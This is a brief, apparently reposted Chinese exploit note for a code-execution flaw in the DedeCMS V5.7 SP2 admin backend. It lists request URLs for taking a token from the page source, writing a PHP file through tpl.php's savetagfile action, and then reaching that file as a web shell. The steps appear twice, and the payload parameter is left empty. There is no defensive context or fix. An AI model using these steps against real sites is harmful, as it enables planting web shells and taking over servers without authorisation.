# DedeCMS V5.7 SP2 後台代碼執行漏洞
domain + /dede/tpl.php?action=upload
通過查看頁面源碼即可獲得 token
http://127.0.0.1/uploads/dede/tpl.php?action=upload

http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=&token=
==Shell==
http://127.0.0.1/include/taglib/secnote.lib.php
首先獲取token:
domain + /dede/tpl.php?action=upload
通過查看頁面源碼即可獲得 token
http://127.0.0.1/uploads/dede/tpl.php?action=upload

然後訪問:
http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=&token=
==Shell==
http://127.0.0.1/include/taglib/secnote.lib.php
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容